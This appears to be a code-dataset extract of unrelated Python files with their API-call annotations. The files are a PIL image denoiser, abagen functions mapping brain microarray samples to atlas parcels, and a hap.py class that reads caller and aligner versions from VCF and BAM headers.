((4970, 5094), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'Could not find event from event_id'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message':\n 'Could not find event from event_id'}, status=status.HTTP_400_BAD_REQUEST)\n", (4978, 5094), False, 'from rest_framework.response import Response\n'), ((2704, 2759), 'attendance.models.Attendance.objects.get', 'Attendance.objects.get', ([], {'event': 'event', 'member': 'band_member'}), '(event=event, member=band_member)\n', (2726, 2759), False, 'from attendance.models import Attendance\n'), ((3368, 3441), 'attendance.models.Attendance.objects.create', 'Attendance.objects.create', ([], {'event': 'event', 'member': 'band_member', 'assigned': '(True)'}), '(event=event, member=band_member, assigned=True)\n', (3393, 3441), False, 'from attendance.models import Attendance\n'), ((3706, 3801), 'attendance.models.Attendance.objects.get', 'Attendance.objects.get', ([], {'event': 'event', 'member': 'band_member', 'points__isnull': '(True)', 'assigned': '(True)'}), '(event=event, member=band_member, points__isnull=True,\n assigned=True)\n', (3728, 3801), False, 'from attendance.models import Attendance\n'), ((5193, 5263), 'attendance.models.Attendance.objects.filter', 'Attendance.objects.filter', ([], {'event': 'event', 'assigned': '(False)', 'is_active': '(True)'}), '(event=event, assigned=False, is_active=True)\n', (5218, 5263), False, 'from attendance.models import Attendance\n')]
|
#-*- coding: utf-8 -*-
import os
from PIL import Image, ImageDraw, ImageEnhance
def denoise(img):
im = Image.open(img)
enhancer = ImageEnhance.Contrast(im)
im = enhancer.enhance(3)
im = im.convert('1')
data = im.getdata()
w, h = im.size
for x in range(1, w-1):
l = []
y = 1
while(y < h-1):
m = y
count = 0
while(m < h-1 and im.getpixel((x, m)) == 0):
count = count + 1
m = m + 1
if(count <= 2 and count > 0):
c = count
while c > 0:
l.append(m - c)
c = c - 1
y = y + count + 1
if len(l) != 0:
i = 1
while i < len(l):
data.putpixel((x, l[i]), 255)
i = i + 1
for y in range(1, h-1):
l = []
x = 1
while(x < w-1):
m = x
count = 0
while(m < w-1 and im.getpixel((m, y)) == 0):
count = count + 1
m = m + 1
if(count <= 2 and count > 0):
c = count
while c > 0:
l.append(m - c)
c = c - 1
x = x + count + 1
if len(l) != 0:
i = 1
while i < len(l):
data.putpixel((l[i], y), 255)
i = i + 1
return im
def NaiveRemoveNoise(im, pnum = 5):
w, h = im.size;
white = 255;
black = 0;
for i in range(0, w):
im.putpixel((i, 0), white);
im.putpixel((i, h - 1), white);
for i in range(0, h):
im.putpixel((0, i), white);
im.putpixel((w - 1, i), white);
for i in range(1, w - 1):
for j in range(1, h - 1):
val = im.getpixel((i, j));
# 黑色的情况
if val == black:
cnt = 0;
for ii in range(-1, 2):
for jj in range(-1, 2):
if im.getpixel((i + ii, j + jj)) == black:
cnt += 1;
if cnt < pnum:
im.putpixel((i, j), white);
else:
cnt = 0;
for ii in range(-1, 2):
for jj in range(-1, 2):
if im.getpixel((i + ii, j + jj)) == black:
cnt += 1;
if cnt >= 7:
im.putpixel((i, j), black);
if __name__ == '__main__':
img = 'test/0004.jpg'
new = denoise(img)
new.save('clean1.jpg')
NaiveRemoveNoise(new)
new.save('clean2.jpg')
|
[
"PIL.ImageEnhance.Contrast",
"PIL.Image.open"
] |
[((113, 128), 'PIL.Image.open', 'Image.open', (['img'], {}), '(img)\n', (123, 128), False, 'from PIL import Image, ImageDraw, ImageEnhance\n'), ((145, 170), 'PIL.ImageEnhance.Contrast', 'ImageEnhance.Contrast', (['im'], {}), '(im)\n', (166, 170), False, 'from PIL import Image, ImageDraw, ImageEnhance\n')]
|
# -*- coding: utf-8 -*-
"""
Functions for mapping AHBA microarray dataset to atlases and and parcellations
in MNI space
"""
from functools import reduce
from nilearn._utils import check_niimg_3d
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from abagen import datasets, io, process, utils
def _assign_sample(sample, atlas, sample_info=None, atlas_info=None,
tolerance=2):
"""
Determines which parcel `sample` belongs to in `atlas`
Parameters
----------
sample : (1, 3) array_like
Coordinates (ijk) of microarray sample in `atlas` space
atlas : niimg-like object
ROI image, where each ROI should be identified with a unique
integer ID
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the specified `atlas`. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
label : int
Parcel label of `sample`
"""
# pull relevant info from atlas
label_data = check_niimg_3d(atlas).get_data()
# expand provided coordinates to include those w/i `tolerance` of `coords`
# set a hard euclidean distance limit to account for different voxel sizes
coords = utils.expand_roi(sample, dilation=tolerance, return_array=True)
coords = coords[cdist(sample, coords).squeeze() < tolerance]
# grab non-zero labels for expanded coordinates
possible_labels = label_data[coords[:, 0], coords[:, 1], coords[:, 2]]
nz_labels = possible_labels[possible_labels.nonzero()]
labels, counts = np.unique(nz_labels, return_counts=True)
# if atlas_info and sample_info are provided, drop potential labels who
# don't match hemisphere or structural class defined in `sample_info`
if atlas_info is not None and sample_info is not None:
for old_label in labels:
new_label = _check_label(old_label, sample_info, atlas_info)
if old_label != new_label:
nz_labels[nz_labels == old_label] = new_label
labels, counts = np.unique(nz_labels[nz_labels.nonzero()],
return_counts=True)
# if there is still nothing in the vicinity, return 0
if labels.size == 0:
return 0
# if there is only one ROI in the vicinity, use that
elif labels.size == 1:
return labels[0]
# if more than one ROI in the vicinity, return the most frequent
indmax, = np.where(counts == counts.max())
if indmax.size == 1:
return labels[indmax[0]]
# if two or more parcels tied for neighboring frequency, use ROI
# with closest centroid to `coords`
centroids = utils.get_centroids(atlas, labels)
return labels[utils.closest_centroid(sample, centroids)]
def _check_label(label, sample_info, atlas_info):
"""
Checks that `label` defined by `sample_info` is coherent with `atlas_info`
Parameters
----------
label : int
Tenative label for sample described by `sample_info`
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the atlas of interest. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
Returns
-------
label : int
New label for sample
"""
cols = ['hemisphere', 'structure']
if label != 0:
sample_info = sample_info[cols]
atlas_info = atlas_info.loc[label][cols]
if not np.all(sample_info.values == atlas_info.values):
label = 0
return label
def label_samples(annotation, atlas, atlas_info=None, tolerance=2):
"""
Matches all microarray samples in `annotation` to parcels in `atlas`
Attempts to place each sample provided in `annotation` into a parcel in
`atlas`, where the latter is a 3D niimg-like object that contains parcels
each idnetified by a unique integer ID.
The function tries to best match samples in `annotation` to parcels defined
in `atlas` by:
1. Determining if the sample falls directly within a parcel,
2. Checking to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. Assigning the sample to the closest parcel if there are multiple
nearby parcels, where closest is determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If there is still no parcel for a given sample after this
process the sample is provided a label of 0.
Parameters
----------
annotation : (S, 13) pandas.DataFrame
Pre-loaded annotation information for a given AHBA donor
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : pandas.DataFrame, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have _at least_ columns 'id', 'hemisphere', and
'structure' containing information mapping atlas IDs to hemisphere and
broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
labels : (S, 1) pandas.DataFrame
Dataframe with parcel labels for each of `S` samples
"""
# get annotation and atlas data
annotation = io.read_annotation(annotation)
atlas = check_niimg_3d(atlas)
label_data, affine = atlas.get_data(), atlas.affine
# load atlas_info, if provided
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get ijk coordinates for microarray samples and find labels
g_ijk = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']], affine)
labelled_samples = label_data[g_ijk[:, 0], g_ijk[:, 1], g_ijk[:, 2]]
# if sample coordinates aren't directly inside a parcel, increment radius
# around sample up to `tolerance` to try and find nearby parcels.
# if still no parcel, then ignore this sample
for idx in np.where(labelled_samples == 0)[0]:
label, tol = labelled_samples[idx], 1
while label == 0 and tol <= tolerance:
label = _assign_sample(g_ijk[[idx]], atlas,
sample_info=annotation.iloc[idx],
atlas_info=atlas_info,
tolerance=tol)
tol += 1
labelled_samples[idx] = label
return pd.DataFrame(labelled_samples, dtype=int,
columns=['label'], index=annotation.index)
def group_by_label(microarray, sample_labels, labels=None, metric='mean'):
"""
Averages expression data in `microarray` over samples with same label
Parameters
----------
microarray : (S, G) pandas.DataFrame
Microarray expression data, where `S` is samples and `G` is genes
sample_labels : (S, 1) pandas.DataFrame
Parcel labels for `S` samples, as returned by e.g., `label_samples()`
labels : (L,) array_like, optional
All possible labels for parcellation (to account for possibility that
some parcels have NO expression data). Default: None
metric : str or func, optional
Mechanism by which to collapse across samples within a parcel. If a
str, should be in ['mean', 'median']; if a function, should be able to
accept an `N`-dimensional input and the `axis` keyword argument and
return an `N-1`-dimensional output. Default: 'mean'
Returns
-------
gene_by_label : (L, G) pandas.DataFrame
Microarray expression data
"""
# get combination function
metric = utils.check_metric(metric)
# get missing labels
if labels is not None:
missing = np.setdiff1d(labels, sample_labels)
labels = pd.DataFrame(columns=microarray.columns,
index=pd.Series(missing, name='label'))
gene_by_label = (microarray.merge(sample_labels,
left_index=True,
right_index=True)
.groupby('label')
.aggregate(metric)
.append(labels)
.drop([0])
.sort_index()
.rename_axis('label'))
return gene_by_label
def get_expression_data(atlas, atlas_info=None, *, exact=True,
tolerance=2, metric='mean', ibf_threshold=0.5,
corrected_mni=True, reannotated=True,
return_counts=False, return_donors=False,
donors='all', data_dir=None):
"""
Assigns microarray expression data to ROIs defined in `atlas`
This function aims to provide a workflow for generating pre-processed,
microarray expression data for abitrary `atlas` designations. First, some
basic filtering of genetic probes is performed, including:
1. Intensity-based filtering of microarray probes to remove probes that
do not exceed a certain level of background noise (specified via the
`ibf_threshold` parameter), and
2. Selection of a single, representative probe for each gene via a
differential stability metric, wherein the probe that has the most
consistent regional variation across donors is retained.
Tissue samples are then matched to parcels in the defined `atlas` for each
donor. If `atlas_info` is provided then this matching is constrained by
both hemisphere and tissue class designation (e.g., cortical samples from
the left hemisphere are only matched to ROIs in the left cortex,
subcortical samples from the right hemisphere are only matched to ROIs in
the left subcortex); see the `atlas_info` parameter description for more
information.
Matching of microarray samples to parcels in `atlas` is done via a multi-
step process:
1. Determine if the sample falls directly within a parcel,
2. Check to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. If there are multiple nearby parcels, the sample is assigned to the
closest parcel, as determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If multiple sample are assigned to the same parcel they are
aggregated with the metric specified via the `metric` parameter. More
control over the sample matching can be obtained by setting the `exact`
parameter; see the parameter description for more information.
Once all samples have been matched to parcels for all supplied donors, the
microarray expression data are normalized within-donor via a scaled robust
sigmoid (SRS) procedure before being combined across donors via the
supplied `metric`.
Parameters
----------
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : str or :class:`pandas.DataFrame`, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have at least columns 'id', 'hemisphere', and 'structure'
containing information mapping atlas IDs to hemisphere (i.e, "L", "R")
and broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
exact : bool, optional
Whether to use exact matching of donor tissue samples to parcels in
`atlas`. If True, this function will match tissue samples to parcels
within `threshold` mm of the sample; any samples that are beyond
`threshold` mm of a parcel will be discarded. This may result in some
parcels having no assigned sample / expression data. If False, the
default matching procedure will be performed and followed by a check
for parcels with no assigned samples; any such parcels will be matched
to the nearest sample (nearest defined as the sample with the closest
Euclidean distance to the parcel centroid). Default: True
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
metric : str or func, optional
Mechanism by which to collapse across donors, if input `files` provides
multiple donor datasets. If a str, should be in ['mean', 'median']; if
a function, should be able to accept an `N`-dimensional input and the
`axis` keyword argument and return an `N-1`-dimensional output.
Default: 'mean'
ibf_threshold : [0, 1] float, optional
Threshold for intensity-based filtering specifying. This number should
specify the ratio of samples, across all supplied donors, for which a
probe must have signal above background noise in order to be retained.
Default: 0.5
corrected_mni : bool, optional
Whether to use the "corrected" MNI coordinates shipped with the
`alleninf` package instead of the coordinates provided with the AHBA
data when matching tissue samples to anatomical regions. Default: True
reannotated : bool, optional
Whether to use reannotated probe information provided by [1]_ instead
of the default probe information from the AHBA dataset. Using
reannotated information will discard probes that could not be reliably
matched to genes. Default: True
return_counts : bool, optional
Whether to return how many samples were assigned to each parcel in
`atlas` for each donor. Default: False
return_donors : bool, optional
Whether to return donor-level expression arrays instead of aggregating
expression across donors with provided `metric`. Default: False
donors : list, optional
List of donors to use as sources of expression data. Can be either
donor numbers or UID. If not specified will use all available donors.
Default: 'all'
data_dir : str, optional
Directory where expression data should be downloaded (if it does not
already exist) / loaded. If not specified will use the current
directory. Default: None
Returns
-------
expression : (R, G) :class:`pandas.DataFrame`
Microarray expression for `R` regions in `atlas` for `G` genes,
aggregated across donors, where the index corresponds to the unique
integer IDs of `atlas` and the columns are gene names.
counts : (R, D) :class:`pandas.DataFrame`
Number of samples assigned to each of `R` regions in `atlas` for each
of `D` donors (if multiple donors were specified); only returned if
`return_counts=True`.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2019). A
practical guide to linking brain-wide gene expression and neuroimaging
data. NeuroImage, 189, 353-367.
.. [2] <NAME>. et al. (2012) An anatomically comprehensive atlas of
the adult human transcriptome. Nature, 489, 391-399.
"""
# fetch files
files = datasets.fetch_microarray(data_dir=data_dir, donors=donors)
for key in ['microarray', 'probes', 'annotation', 'pacall', 'ontology']:
if key not in files:
raise KeyError('Provided `files` dictionary is missing {}. '
'Please check inputs.'.format(key))
# load atlas_info, if provided
atlas = check_niimg_3d(atlas)
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get combination functions
metric = utils.check_metric(metric)
# get some info on the number of subjects, labels in `atlas_img`
num_subj = len(files.microarray)
all_labels = utils.get_unique_labels(atlas)
if not exact:
centroids = utils.get_centroids(atlas, labels=all_labels)
# reannotate probes based on updates from Arnatkeviciute et al., 2018 then
# perform intensity-based filter of probes and select probe with highest
# differential stability for each gene amongst remaining probes
if reannotated:
probes = process.reannotate_probes(files.probes[0])
else:
probes = io.read_probes(files.probes[0])
probes = process.filter_probes(files.pacall, probes,
threshold=ibf_threshold)
probes = process.get_stable_probes(files.microarray, files.annotation,
probes)
expression, missing = [], []
counts = pd.DataFrame(np.zeros((len(all_labels) + 1, num_subj)),
index=np.append([0], all_labels))
for subj in range(num_subj):
# get rid of samples whose coordinates don't match ontological profile
annotation = process.drop_mismatch_samples(files.annotation[subj],
files.ontology[subj],
corrected=corrected_mni)
# subset representative probes + samples from microarray data
microarray = io.read_microarray(files.microarray[subj])
samples = microarray.loc[probes.index, annotation.index].T
samples.columns = probes.gene_symbol
# assign samples to regions and aggregate samples w/i the same region
sample_labels = label_samples(annotation, atlas,
atlas_info=atlas_info,
tolerance=tolerance)
expression += [group_by_label(samples, sample_labels,
all_labels, metric=metric)]
# get counts of samples collapsed into each ROI
labs, num = np.unique(sample_labels, return_counts=True)
counts.loc[labs, subj] = num
# if we don't want to do exact matching then cache which parcels are
# missing data and the expression data for the closest sample to that
# parcel; we'll use this once we've iterated through all donors
if not exact:
coords = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']],
atlas.affine)
empty = ~np.in1d(all_labels, labs)
closest, dist = utils.closest_centroid(coords, centroids[empty],
return_dist=True)
closest = samples.loc[annotation.iloc[closest].index]
empty = all_labels[empty]
closest.index = pd.Series(empty, name='label')
missing += [(closest, dict(zip(empty, np.diag(dist))))]
# check for missing ROIs and fill in, as needed
if not exact:
# find labels that are missing across all donors
empty = reduce(set.intersection, [set(f.index) for f, d in missing])
for roi in empty:
# find donor with sample closest to centroid of empty parcel
ind = np.argmin([d.get(roi) for f, d in missing])
# assign expression data from that sample and add to count
expression[ind].loc[roi] = missing[ind][0].loc[roi]
counts.loc[roi, ind] += 1
# normalize data with SRS and aggregate across donors
expression = [process.normalize_expression(e) for e in expression]
if not return_donors:
expression = process.aggregate_donors(expression, metric)
if return_counts:
return expression, counts.iloc[1:]
return expression
|
[
"abagen.utils.check_metric",
"abagen.utils.xyz_to_ijk",
"abagen.io.read_probes",
"abagen.process.drop_mismatch_samples",
"numpy.diag",
"numpy.unique",
"pandas.DataFrame",
"abagen.utils.closest_centroid",
"abagen.process.get_stable_probes",
"abagen.process.normalize_expression",
"nilearn._utils.check_niimg_3d",
"abagen.process.filter_probes",
"numpy.append",
"scipy.spatial.distance.cdist",
"abagen.utils.check_atlas_info",
"abagen.io.read_microarray",
"abagen.utils.get_unique_labels",
"abagen.utils.expand_roi",
"pandas.Series",
"abagen.io.read_annotation",
"numpy.all",
"abagen.process.aggregate_donors",
"abagen.utils.get_centroids",
"abagen.datasets.fetch_microarray",
"numpy.setdiff1d",
"numpy.where",
"abagen.process.reannotate_probes",
"numpy.in1d"
] |
[((1758, 1821), 'abagen.utils.expand_roi', 'utils.expand_roi', (['sample'], {'dilation': 'tolerance', 'return_array': '(True)'}), '(sample, dilation=tolerance, return_array=True)\n', (1774, 1821), False, 'from abagen import datasets, io, process, utils\n'), ((2095, 2135), 'numpy.unique', 'np.unique', (['nz_labels'], {'return_counts': '(True)'}), '(nz_labels, return_counts=True)\n', (2104, 2135), True, 'import numpy as np\n'), ((3186, 3220), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas', 'labels'], {}), '(atlas, labels)\n', (3205, 3220), False, 'from abagen import datasets, io, process, utils\n'), ((6448, 6478), 'abagen.io.read_annotation', 'io.read_annotation', (['annotation'], {}), '(annotation)\n', (6466, 6478), False, 'from abagen import datasets, io, process, utils\n'), ((6491, 6512), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (6505, 6512), False, 'from nilearn._utils import check_niimg_3d\n'), ((6777, 6842), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], affine)\n", (6793, 6842), False, 'from abagen import datasets, io, process, utils\n'), ((7563, 7652), 'pandas.DataFrame', 'pd.DataFrame', (['labelled_samples'], {'dtype': 'int', 'columns': "['label']", 'index': 'annotation.index'}), "(labelled_samples, dtype=int, columns=['label'], index=\n annotation.index)\n", (7575, 7652), True, 'import pandas as pd\n'), ((8760, 8786), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (8778, 8786), False, 'from abagen import datasets, io, process, utils\n'), ((16518, 16577), 'abagen.datasets.fetch_microarray', 'datasets.fetch_microarray', ([], {'data_dir': 'data_dir', 'donors': 'donors'}), '(data_dir=data_dir, donors=donors)\n', (16543, 16577), False, 'from abagen import datasets, io, process, utils\n'), ((16868, 16889), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (16882, 16889), False, 'from nilearn._utils import check_niimg_3d\n'), ((17030, 17056), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (17048, 17056), False, 'from abagen import datasets, io, process, utils\n'), ((17181, 17211), 'abagen.utils.get_unique_labels', 'utils.get_unique_labels', (['atlas'], {}), '(atlas)\n', (17204, 17211), False, 'from abagen import datasets, io, process, utils\n'), ((17673, 17741), 'abagen.process.filter_probes', 'process.filter_probes', (['files.pacall', 'probes'], {'threshold': 'ibf_threshold'}), '(files.pacall, probes, threshold=ibf_threshold)\n', (17694, 17741), False, 'from abagen import datasets, io, process, utils\n'), ((17790, 17859), 'abagen.process.get_stable_probes', 'process.get_stable_probes', (['files.microarray', 'files.annotation', 'probes'], {}), '(files.microarray, files.annotation, probes)\n', (17815, 17859), False, 'from abagen import datasets, io, process, utils\n'), ((3239, 3280), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['sample', 'centroids'], {}), '(sample, centroids)\n', (3261, 3280), False, 'from abagen import datasets, io, process, utils\n'), ((6657, 6698), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (6679, 6698), False, 'from abagen import datasets, io, process, utils\n'), ((7130, 7161), 'numpy.where', 'np.where', (['(labelled_samples == 0)'], {}), '(labelled_samples == 0)\n', (7138, 7161), True, 'import numpy as np\n'), ((8858, 8893), 'numpy.setdiff1d', 'np.setdiff1d', (['labels', 'sample_labels'], {}), '(labels, sample_labels)\n', (8870, 8893), True, 'import numpy as np\n'), ((16942, 16983), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (16964, 16983), False, 'from abagen import datasets, io, process, utils\n'), ((17250, 17295), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas'], {'labels': 'all_labels'}), '(atlas, labels=all_labels)\n', (17269, 17295), False, 'from abagen import datasets, io, process, utils\n'), ((17558, 17600), 'abagen.process.reannotate_probes', 'process.reannotate_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17583, 17600), False, 'from abagen import datasets, io, process, utils\n'), ((17628, 17659), 'abagen.io.read_probes', 'io.read_probes', (['files.probes[0]'], {}), '(files.probes[0])\n', (17642, 17659), False, 'from abagen import datasets, io, process, utils\n'), ((18195, 18299), 'abagen.process.drop_mismatch_samples', 'process.drop_mismatch_samples', (['files.annotation[subj]', 'files.ontology[subj]'], {'corrected': 'corrected_mni'}), '(files.annotation[subj], files.ontology[subj],\n corrected=corrected_mni)\n', (18224, 18299), False, 'from abagen import datasets, io, process, utils\n'), ((18490, 18532), 'abagen.io.read_microarray', 'io.read_microarray', (['files.microarray[subj]'], {}), '(files.microarray[subj])\n', (18508, 18532), False, 'from abagen import datasets, io, process, utils\n'), ((19106, 19150), 'numpy.unique', 'np.unique', (['sample_labels'], {'return_counts': '(True)'}), '(sample_labels, return_counts=True)\n', (19115, 19150), True, 'import numpy as np\n'), ((20609, 20640), 'abagen.process.normalize_expression', 'process.normalize_expression', (['e'], {}), '(e)\n', (20637, 20640), False, 'from abagen import datasets, io, process, utils\n'), ((20709, 20753), 'abagen.process.aggregate_donors', 'process.aggregate_donors', (['expression', 'metric'], {}), '(expression, metric)\n', (20733, 20753), False, 'from abagen import datasets, io, process, utils\n'), ((1553, 1574), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (1567, 1574), False, 'from nilearn._utils import check_niimg_3d\n'), ((4221, 4268), 'numpy.all', 'np.all', (['(sample_info.values == atlas_info.values)'], {}), '(sample_info.values == atlas_info.values)\n', (4227, 4268), True, 'import numpy as np\n'), ((18034, 18060), 'numpy.append', 'np.append', (['[0]', 'all_labels'], {}), '([0], all_labels)\n', (18043, 18060), True, 'import numpy as np\n'), ((19459, 19530), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'atlas.affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], atlas.affine)\n", (19475, 19530), False, 'from abagen import datasets, io, process, utils\n'), ((19644, 19710), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['coords', 'centroids[empty]'], {'return_dist': '(True)'}), '(coords, centroids[empty], return_dist=True)\n', (19666, 19710), False, 'from abagen import datasets, io, process, utils\n'), ((19894, 19924), 'pandas.Series', 'pd.Series', (['empty'], {'name': '"""label"""'}), "(empty, name='label')\n", (19903, 19924), True, 'import pandas as pd\n'), ((8988, 9020), 'pandas.Series', 'pd.Series', (['missing'], {'name': '"""label"""'}), "(missing, name='label')\n", (8997, 9020), True, 'import pandas as pd\n'), ((19590, 19615), 'numpy.in1d', 'np.in1d', (['all_labels', 'labs'], {}), '(all_labels, labs)\n', (19597, 19615), True, 'import numpy as np\n'), ((1842, 1863), 'scipy.spatial.distance.cdist', 'cdist', (['sample', 'coords'], {}), '(sample, coords)\n', (1847, 1863), False, 'from scipy.spatial.distance import cdist\n'), ((19975, 19988), 'numpy.diag', 'np.diag', (['dist'], {}), '(dist)\n', (19982, 19988), True, 'import numpy as np\n')]
|
# coding=utf-8
#
# Copyright (c) 2010-2015 Illumina, Inc.
# All rights reserved.
#
# This file is distributed under the simplified BSD license.
# The full text can be found here (and in LICENSE.txt in the root folder of
# this distribution):
#
# https://github.com/sequencing/licenses/blob/master/Simplified-BSD-License.txt
import tempfile
import itertools
import subprocess
import logging
import os
import json
class CallerInfo(object):
""" Class for collecting caller info and version
"""
def __init__(self):
# callers and aligners are stored in tuples of three:
# (caller/aligner, version, parameters)
self.callers = []
self.aligners = []
def __repr__(self):
return "aligners=[" + ",".join(["/".join(xx) for xx in self.aligners]) + "] " + \
"callers=[" + ",".join(["/".join(xx) for xx in self.callers]) + "]"
def asDict(self):
kvd = ["name", "version", "parameters"]
return {"aligners": [dict(y for y in zip(kvd, x)) for x in self.aligners],
"callers": [dict(y for y in zip(kvd, x)) for x in self.callers]}
def addVCF(self, vcfname):
""" Add caller versions from a VCF
:param vcfname: VCF file name
"""
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
vfh = {}
try:
sp = subprocess.Popen("vcfhdr2json '%s' '%s'" % (vcfname, tf.name),
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
o, e = sp.communicate()
if sp.returncode != 0:
raise Exception("vcfhdr2json call failed: %s / %s" % (o, e))
vfh = json.load(open(tf.name))
finally:
try:
os.unlink(tf.name)
except:
pass
cp = ['unknown', 'unknown', '']
gatk_callers = ["haplotypecaller", "unifiedgenotyper", "mutect"]
sent_callers = ["haplotyper"]
source_found = False
for hf in vfh["fields"]:
try:
k = hf["key"]
if k == "source":
try:
cp[0] = str(hf["values"])
except:
cp[0] = hf["value"]
if cp[0].startswith("Platypus_Version_"):
cp[1] = cp[0][len("Platypus_Version_"):]
cp[0] = "Platypus"
source_found = True
elif k == "source_version":
try:
cp[1] = str(hf["values"])
except:
cp[1] = hf["value"]
source_found = True
elif k == "cmdline":
try:
cp[2] = str(hf["values"])
except:
cp[2] = hf["value"]
source_found = True
elif k == "platypusOptions":
try:
cp[2] = str(hf["values"])
except:
cp[2] = hf["value"]
source_found = True
elif k == "octopus":
# octopus doesn't add a version
self.callers.append(["octopus", "unknown", str(hf["values"])])
elif k.startswith("GATKCommandLine"):
caller = "GATK"
try:
caller += "-" + hf["values"]["ID"]
except:
pass
version = "unknown"
try:
version = hf["values"]["Version"]
except:
pass
options = ""
try:
options = hf["values"]["CommandLineOptions"]
except:
pass
if any(g in caller.lower() for g in gatk_callers):
self.callers.append([caller, version, options])
elif k.startswith("SentieonCommandLine"):
caller = "Sentieon"
try:
caller += "-" + hf["values"]["ID"]
except:
pass
version = "unknown"
try:
version = hf["values"]["Version"]
except:
pass
options = ""
if any(s in caller.lower() for s in sent_callers):
self.callers.append([caller, version])
except:
pass
if source_found:
self.callers.append(cp)
def addBAM(self, bamfile):
""" Extract aligner information from a BAM file
:param bamfile: name of BAM file
"""
sp = subprocess.Popen("samtools view -H '%s'" % bamfile,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
o, e = sp.communicate()
if sp.returncode != 0:
raise Exception("Samtools call failed: %s / %s" % (o, e))
for line in o.split("\n"):
if not line.startswith("@PG"):
continue
try:
# noinspection PyTypeChecker
x = dict(y.split(":", 1) for y in line.split("\t")[1:])
except:
logging.warn("Unable to parse SAM/BAM header line: %s" % line)
continue
cp = ['unknown', 'unknown', '']
try:
cp[0] = x['PN']
except:
try:
cp[0] = x['ID']
if "-" in cp[0]:
cp[0] = cp[0].split("-")[0]
except:
pass
try:
cp[1] = x['VN']
except:
pass
try:
cp[2] = x['CL']
except:
pass
self.aligners.append(cp)
|
[
"logging.warn",
"tempfile.NamedTemporaryFile",
"subprocess.Popen",
"os.unlink"
] |
